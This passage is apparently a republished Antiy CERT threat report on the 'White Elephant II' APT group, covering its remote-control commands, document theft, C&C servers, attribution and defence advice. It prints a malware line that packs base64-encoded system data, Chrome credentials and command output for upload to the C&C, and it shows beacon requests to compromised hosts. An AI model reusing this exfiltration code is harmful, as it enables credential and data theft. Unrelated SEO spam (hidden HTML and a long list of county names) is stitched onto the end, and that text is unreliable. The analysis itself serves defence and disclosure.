$postdata = “ddager=” &$regstat &“&r1=” &b64encode(@OSVersion) &“&r2=” &b64encode(@OSArch) &“&r3=” &b64encode($p_ver) &“&r4=” &b64encode($emorhc) &“&r5=” &b64encode($cmdout) &“&r6=” &b64encode($admin)

2. 具有遠程控制功能,根據遠程服務器指令的不同,執行不同的操作。從相關指令集上來看,設計相對比較粗糙;

圖 3 15 指令分支

 

分支 對應功能
1 輸出調試信息,并延遲1秒后重新連接C&C。
2 利用PowerShell提權,并執行遠程接受的PowerShell指令,對應的指令編號為2。
3 這個指令是修改$stat的標記值。
4 退出。
5 收集Chrome瀏覽器中記錄的網站用戶名及密碼,對應的指令編號為5。
6 利用PowerShell執行下載新惡意程序,并運行,對應的指令編號為6。
7 利用Autoit自帶函數執行下載新惡意程序,并運行,對應的指令編號為7。
8 以隱藏的模式執行CMD命令,并記錄命令返回數據。

 

3. 收集計算機內的各類文檔文件,以MD5命名打包后上傳到C&C,白象一代和白象二代收集的擴展名對比如下:

 

白象一代 *.doc *.docx *.xls *.ppt *.pps *.pptx *.xlsx *.pdf      
白象二代 *.doc *.docx *.xls *.ppt   *.pptx *.xlsx *.pdf *.csv *.pst *.jpeg

 

圖 3 16 收集文件代碼

釋放cup.exe程序,并以打包的文件路徑為參數調用,cup.exe的主要功能是上傳竊取的文件。

圖 3 16 收集文件代碼

釋放cup.exe程序,并以打包的文件路徑為參數調用,cup.exe的主要功能是上傳竊取的文件。

樣本標簽如下:

 

病毒名稱 Trojan[Exploit]/Win32. ShellCode
原始文件名 sysvolinfo.exe
MD5 465DE3DB14158005EDE000F7C0F16EFE
處理器架構 X86
文件大小 10,536,063 字節
文件格式 BinExecute/Microsoft.EXE[:X86]
時間戳 2016-05-16 13:35:59
數字簽名
加殼類型
編譯語言 Microsoft Visual C# / Basic .NET

 

樣本使用Microsoft Visual C#編譯,功能是利用ShellCode來實現連接遠程服務器,接收ShellCode并執行。功能簡單,而且樣本沒做混淆,通過反編譯可以看到明文代碼。我們在商業攻擊平臺MSF生成的ShellCode中可以找到這個片段,但由于這個方法過于通用,目前我們還不能得出白象攻擊組織使用了MSF平臺的結論。

圖 3 18 利用的ShellCode代碼

樣本從服務器接收到的shellcode在完成自解密之后,會與服務器進行交互操作,接收指令并執行,將結果返回給服務器,圖3-19為樣本的運行流程:

圖 3 19 樣本運行流程

3.7 C&C分析

本次行動中漏洞樣本下載都是通過URL下載的方式,而釋放的竊取數據、遠程控制樣本的C&C多數為硬編碼的IP地址,圖3-20為“白象二代”組織使用的部分域名、IP、PE文件和Office文件的對應關系:

圖 3 20 “白象二代”中域名、IP、樣本關系圖

3.8 隱藏、追蹤

3.8.1 第三方郵件服務

我們通過對部分攻擊郵件分析發現,該組織發送郵件的方式是通過第三方郵件服務商群發,這樣在原始郵件的數據中只會存有郵件服務商的信息,攻擊者通過這樣的手法在一定程度上隱藏了自己的IP。

圖 3 21 原始郵件信息

3.8.2 入侵網站

在安天的跟蹤分析中,發現該組織的部分C&C地址是一些正常的網站,經過分析我們認為,有可能該組織入侵了這些網站,將自己的C&C服務控制代碼放到它們的服務器上,以此來隱藏自己的IP信息。同時這種方式還會使安全軟件認為連接的是正常的網站,而不會觸發安全警報。

GET /UAV/ HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; MSOffice 12)

Accept-Encoding: gzip, deflate

Host: www.***gdeals.com

Connection: Keep-Alive

圖 3 22 可能被入侵的網站

GET /facilities/welfare2/news HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; MSOffice 12)Accept-Encoding: gzip, deflateost:

圖 3 23 可能被入侵的網站

3.8.3 與背景和來源相關的信息

基于現有資源可以分析出,“白象二代”組織一名開發人員的ID為:“Kanishk”,通過維基百科查詢到一個類似單詞“Kanishka”,這是一個是梵文譯音,中文翻譯為“迦膩色迦”,迦膩色伽是貴霜帝國(Kushan Empire)的君主,貴霜帝國主要控制范圍在印度河流域。

圖 3 24 “Kanishk”相關信息

4 總結

4.1兩代“白象”的對比

我們將“白象一代”和“白象二代”的部分要素通過表格的形式進行了對比,可以看出相關國家背景攻擊能力的發展:

 

  白象一代 白象二代
主要威脅目標 巴基斯坦大面積的目標和中國的少數目標(如高等院校) 巴基斯坦和中國的大面積目標,包括教育、軍事、科研、媒體等各種目標
先導攻擊手段 魚叉式釣魚郵件,含直接發送附件 魚叉式釣魚郵件,發送帶有格式漏洞文檔的鏈接
竊取的文件類型 *.doc  *.docx  *.xls  *.ppt
*.pps  *.pptx  *.xlsx  *.pdf
*.doc  *.docx  *.xls  *.ppt   
*.pptx  *.xlsx  *.pdf  *.csv
*.pst  *.jpeg
社會工程技巧 PE雙擴展名、打開內嵌圖片,圖片偽造為軍事情報、法院判決書等,較為粗糙 偽造相關軍事、政治信息,較為精細
使用漏洞 未見使用 CVE-2014-4114
CVE-2012-0158
CVE-2015-1761
二進制攻擊載荷開發編譯環境 VC、VB、DEV C++、AutoIT Visual C#、AutoIT
二進制攻擊載荷加殼情況 少數使用UPX 不加殼
數字簽名盜用/仿冒 未見 未見
攻擊組織規模猜想 10~16人,水平參差不齊 有較高攻擊能力的小分隊
威脅后果判斷 造成一定威脅后果 可能造成嚴重后果

 

4.2 大國網絡空間防御能力最終會由攻擊者和窺視者檢驗

在過去數年間,中國的信息系統和用戶遭遇了來自多方的網絡入侵的持續考驗,這些攻擊使用各種高級的(也包括看起來并不足夠高級的)攻擊技巧,以獲取機要信息、科研成果和其他秘密為對象。攻擊組織在關鍵基礎設施和關鍵信息系統中長期持久化,以竊密和獲取更多行動主動權為目的,其危害潛在之大、影響領域之深,絕非網站篡改涂鴉或傳統DDoS所能比擬。這些攻擊也隨實施方的戰略意圖、能力和關注點的不同,表現出不同的方法和特點。盡管中國用戶更多焦慮于那些上帝視角[7]的攻擊,但從我們針對“白象”的分析可以看到,來自地緣利益競合國家與地區的網絡攻擊,同樣是中國信息化的重大風險和挑戰。而且這些攻擊往往雖然顯得有些粗糙,但卻更為頻繁和直接,揮之不去。

對于類似白象這樣的攻擊組織,因缺少人脈和電磁能力作為掩護,其更多依賴類似電子郵件這樣的互聯網入口。從一個全景的防御視圖來看,這本來是一個可以收緊的入口,但對于基礎感知、檢測、防御能力不足的社會肌體來說,這種具有定向性的遠程攻擊是高度有效的,而且會淹沒在大量其他的非定向的安全事件中。

大國防御力,由設計所引導、以產業為基礎、與投入相輔相成,但最終其真實水平,要在與攻擊者和窺探者的真實對壘中來檢驗。

4.3 APT防御需要信息化基本環節和安全能力的共同完善

從“白象”系列攻擊中,我們首先能看到中國在信息化發展上的不足。在“白象二代”組織所投放的目標電子郵箱當中,其中很大比例是免費個人郵箱,在安天之前關于我國郵件安全的內部報告中,就已經指出國內機構用戶有近一半的都使用免費個人信箱作為聯絡郵件這一問題。而國內免費信箱的安全狀況已高度不容樂觀。在啟動信息高速公路建設二十年后,國內依然沒有對官方機構和政務人員實現有效的安全電子郵件服務的覆蓋,這種企業、機構級信息化基礎設施的匱乏,包括互聯網服務商缺乏有效的安全投入,導致了可攻擊點高度離散,降低了攻擊門檻,提升了防御難度。

從“白象”系列攻擊中,我們還能看到中國大量基礎的信息安全環節和產品能力還不到位,“白象一代”曾被安天定性為輕量級APT攻擊,以免殺PE輔以有限的社會工程技巧,進行投放,但卻成功入侵了中國的高等學府。“白象二代”組織盡管在手法上有很大提高,但亦未見其具備0day儲備,其所使用的三個漏洞,在為“白象組織”使用時,微軟已經將其修補,而其中兩個并未經過免殺處理。而類似這樣的攻擊依然能夠大行其道,也是當前補丁、系統加固等基礎安全環節不到位、產品能力不足的體現。

相關攻擊亦說明,傳統的以單包檢測為核心的流量入侵檢測機制,實時檢測為訴求的邊界安全機制等需要得到有效補充和擴展,重要系統必須建立起在流量還原層面針對載荷投放的有效留存和異步深度檢測機制。流量還原與沙箱的組合,將成為重要系統的標配。沙箱不是簡單地補充行為分析能力,而是提升攻擊者預測防御方能力和手段的成本,而不進行能力改進,簡單漢化開源沙箱的做法,等于放棄了沙箱產品的“抗繞過”這一重要安全特性。沙箱絕非簡單的合規安全環節,當年部分IDS簡單借鑒模仿開源SNORT就能夠有效發現問題的時代已經過去。沙箱也不是簡單的擴展反病毒引擎的檢測能力,其核心價值在于有效的漏洞觸發能力和行為的揭示能力,這需要長期以來的安全積累實現工程能力轉化。而其單對象輸入,多向量輸出的產品特點,意味著這是必須依托網絡管理者和廠商支撐團隊的有效互動才能有效發揮價值的產品。

同時無論形態是PC、服務器或云,終端都是數據的基本載體,安全的終極戰場,網絡側的安全能力必須與終端側聯通,形成縱深防御體系。國產操作系統同樣需要安全手段和機制的保駕護航。任何期望御敵于網絡邊界或物理隔離的想象,任何“一招鮮,吃遍天”的打包票承諾,都只能是自我的心理安慰。

4.4 反APT是一種綜合的體系較量

反APT攻擊,要對抗攻擊者在人員、機構、裝備、工程體系方面的綜合投入,其必然是一場成本較量,今天我們看到的安全低于成本價中標等不正常的市場行為,最終都將傷害大國網絡空間安全的整體能力。

反APT攻擊,要對抗攻擊者堅定、持續的攻擊意志,而這同樣對于對抗APT的安全分析團隊提升了更高的要求,從安全廠商角度,是在感知分析工程體系支撐下的持續對抗;我們必須持續跟蹤攻擊者的技巧、意圖和路徑,將這些經驗轉化為用戶側的防御改善和產品能力更新。安全分析團隊既要有曝光對手的勇銳,也要有戍邊十載、不為人知的意志與沉穩。

此外,我們覺得遺憾的是, “白象”作為非常活躍的APT攻擊行動,在過去數年都仿佛始終在國際部大分主流安全廠商的視野之外。因此,像安天過去的多篇報告一樣,本報告也將以中、英雙語發布,盡管我們不知道會有多少海外讀者,但我們希望告知世界關于中國所遭遇到的網絡攻擊的真實情況,“中國是網絡安全受害者”這一事實必然會戰勝某些人所制造的刻板偏見。

附錄一:參考資料

[1] Norman:Unveiling_an_Indian_Cyberattack_Infrastructure

[2] CCF:反病毒方法的現狀、挑戰與改進

http://www.ccf.org.cn/resources/1190201776262/2014/05/12/10.pdf

http://zh.wikipedia.org/wiki/Bash

[3] 安天:APT事件樣本集的度量

http://www.antiy.com/resources/The_Measurement_of_APT_Sample_Set.pdf

[4] 安天技術文章匯編(十 二)-高級持續性威脅(APT)專題第二分冊

[5]安天:A2PT與“準APT”事件中的攻擊武器

http://www.antiy.com/presentation/Attack_Weapons_in_A2PT_and_APT-To-Be_Incidents.pdf

[6] 安天:沙蟲(CVE-2014-4114)相關威脅綜合分析報告——及對追影安全平臺檢測問題的復盤

http://www.antiy.com/response/cve-2014-4114.html

[7] 肖新光:美國憑什么能開啟“上帝模式”

http://news.xinhuanet.com/world/2015-09/19/c_128246851.htm

[8] FireEye:The Dual Use Exploit: CVE-2013-3906 Used in Both Targeted Attacks and Crimeware Campaigns

https://www.fireeye.com/blog/threat-research/2013/11/the-dual-use-exploit-cve-2013-3906-used-in-both-targeted-attacks-and-crimeware-campaigns.html

[9] Scumware.org:Scumware search. scumware.org

http://www.scumware.org/report/173.236.24.254

[10] Theimes:MacKenzie,Stuart

http://www.thetimes.co.uk/tto/multimedia/archive/00372/DOC100113-100120132_372895a.pdf

[11] Wikipedia:CME Group. Wikipedia

http://en.wikipedia.org/wiki/CME_Group

[12] WIPO:WIPO Arbitration and Mediation Center. WIPO

http://www.oapi.wipo.net/amc/en/domains/search/text.jsp?case=D2012-1666

[13] Scumware.org:Scumware search. Scumware.org

http://www.scumware.org/report/bluecreams.com

[14] Clean-mx:Viruswatch. Virus-sites with status changes. Clean-MX.com

http://lists.clean- mx.com/pipermail/viruswatch/20110317/023586.html

附錄二:事件日志

 

時間 相關事項
2012年7月6日 安天捕獲白象事件針對中國某高校攻擊的首個事件,當時作為一般樣本入庫,后陸續捕獲其他樣本。
2013年5月20日 Norman發布報告《OPERATION HANGOVER |Executive Summary——Unveiling an Indian Cyberattack Infrastructure》,曝光了HangOver攻擊行動。
2013年8月22日 安天在中科院某機構做小報告,介紹對“白象行動”的跟蹤分析情況。
2014年4月 安天在中國計算機學會會刊《中國計算機學會通訊》上撰文,少量披露分析進展。
2014年9月 安天在互聯網安全大會報告中,全面披露本事件,但因其他原因,報告未能發布。
2015年12月18日 相關報告被編入《安天技術文章匯編(十 二)-APT專題第二分冊》。
2016年1月26日 安天捕獲到“白象二代”利用CVE-2014-4114漏洞針對國內攻擊的樣本。
2016年2月至5月 連續捕獲到“白象二代”的魚叉式釣魚郵件。
2016年5月 在捕獲到多起事件后,安天分析人員發現和“白象一代”有關。
2016年7月5日 “白象二代”內部分析報告完成。

 

附錄三:關于安天

安天從反病毒引擎研發團隊起步,目前已發展成為以安天實驗室為總部,以企業安全公司、移動安全公司為兩翼的集團化安全企業。安天始終堅持以安全保障用戶價值為企業信仰,崇尚自主研發創新,在安全檢測引擎、移動安全、網絡協議分析還原、動態分析、終端防護、虛擬化安全等方面形成了全能力鏈布局。安天的監控預警能力覆蓋全國、產品與服務輻射多個國家。安天將大數據分析、安全可視化等方面的技術與產品體系有效結合,以海量樣本自動化分析平臺延展工程師團隊作業能力、縮短產品響應周期。結合多年積累的海量安全威脅知識庫,綜合應用大數據分析、安全可視化等方面經驗,推出了應對高級持續性威脅(APT)和面向大規模網絡與關鍵基礎設施的態勢感知與監控預警解決方案。

全球超過三十家以上的著名安全廠商、IT廠商選擇安天作為檢測能力合作伙伴,安天的反病毒引擎得以為全球近十萬臺網絡設備和網絡安全設備、近兩億部手機提供安全防護。安天移動檢測引擎是全球首個獲得AV-TEST年度獎項的中國產品。

安天技術實力得到行業管理機構、客戶和伙伴的認可,安天已連續四屆蟬聯國家級安全應急支撐單位資質,亦是中國國家信息安全漏洞庫六家首批一級支撐單位之一。

安天是中國應急響應體系中重要的企業節點,在紅色代碼、口令蠕蟲、震網、破殼、沙蟲、方程式等重大安全事件中,安天提供了先發預警、深度分析或系統的解決方案。

 

安天實驗室更多信息請訪問: http://www.antiy.com (中文)
http://www.antiy.net (英文)
安天企業安全公司更多信息請訪問: http://www.antiy.cn
安天移動安全公司(AVL TEAM)更多信息請訪問: http://www.avlsec.com

 

*本文作者:安天實驗室安全研究與應急處理中心(Antiy CERT)(企業賬號),轉載請注明來自FreeBuf黑客與極客(FreeBuf.COM)

關鍵字:白象

本文摘自:黑客與極客

電子周刊
回到頂部

關于我們聯系我們版權聲明隱私條款廣告服務友情鏈接投稿中心招賢納士

企業網版權所有 ©2010-2024 京ICP備09108050號-6 京公網安備 11010502049343號

^
  • <menuitem id="jw4sk"></menuitem>

    1. <form id="jw4sk"><tbody id="jw4sk"><dfn id="jw4sk"></dfn></tbody></form>
      主站蜘蛛池模板: 延津县| 交口县| 石渠县| 乌鲁木齐市| 台东县| 高邑县| 永嘉县| 邹城市| 平泉县| 卓资县| 稷山县| 富宁县| 定南县| 鸡泽县| 易门县| 汝州市| 刚察县| 松阳县| 株洲市| 尼勒克县| 靖远县| 江源县| 郑州市| 河池市| 汉中市| 洱源县| 宣汉县| 武穴市| 修水县| 睢宁县| 寻甸| 延川县| 万安县| 广宗县| 梁平县| 虎林市| 夹江县| 饶阳县| 临邑县| 三台县| 昆明市|